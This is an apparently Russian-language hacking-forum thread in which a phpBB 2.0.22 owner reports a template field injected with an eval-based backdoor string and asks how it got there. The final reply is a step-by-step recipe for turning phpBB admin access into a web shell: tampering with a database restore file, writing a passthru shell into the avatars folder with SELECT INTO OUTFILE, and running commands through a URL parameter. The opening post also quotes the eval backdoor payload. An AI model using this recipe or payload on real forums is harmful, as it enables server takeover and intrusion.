Стоит пхпбб 2.0.22. Щас в стилях обнаружил мною не до конца удаленный стиль, но уже кем то обработанный: Style: FI Template: aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp Что это, попытка или уже состовшийся взлом? Я думаю попытка ибо этот код вроде нигде не будет выполняться. Было ли это сделано через акк админа или тут поработали SQL иньекциями? Всем спасибо за версии.
Ещё раз в потверждении моей версии, что код выполняться не будет. Phpbb работает с этой строчкой не более как с именем файла. Но по прежнему интересует каким образом это значение забито, через ак админа вроде так не сделаешь, значит добрались до базы?
Проверил на всякий - но ничего, тоже самое. Через ак админа такую тему реально было замутить? Я просто догадываюсь кто меня ломает, там ломаки сидят - максимум пароль админа сбрутят. Но через админку template_сonfig_file вроде ни как не изменишь?? Да и про SQL иньекции в админке я так же не слышал. Поэтому не могу понять как это злоумышленнику удалось?!
в админке можно выполнить любые скл запросы посредством "восстановление бд" создаешь файлик 1.sql и пишешь в нем любые запросы, потом грузишь и они выполнились внимательнее читай прикрепленный топ про пхпбб
1. Идём в админку и делаем полную копию базы данных . 2. Теперь нам нужно узнать установочную директорию форума смотри тут https://forum.antichat.ru/threadnav24488-1-10.html а теперь правим базу находим такую строку: PHP: INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES('1', 'test', '10'); PHP: INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES('1', '<? passthru("$cmd"); ?>', '10'); SELECT cat_title INTO OUTFILE '/тут_твой_путь_до_форума/images/avatars/shell.php' FROM phpbb_categories where cat_id=1; UPDATE phpbb_categories SET cat_title='test'WHERE cat_id=1; восстанавливаем базу http://site.com/phpBB/images/avatars/shell.php?cmd=ls - тут твой шелл
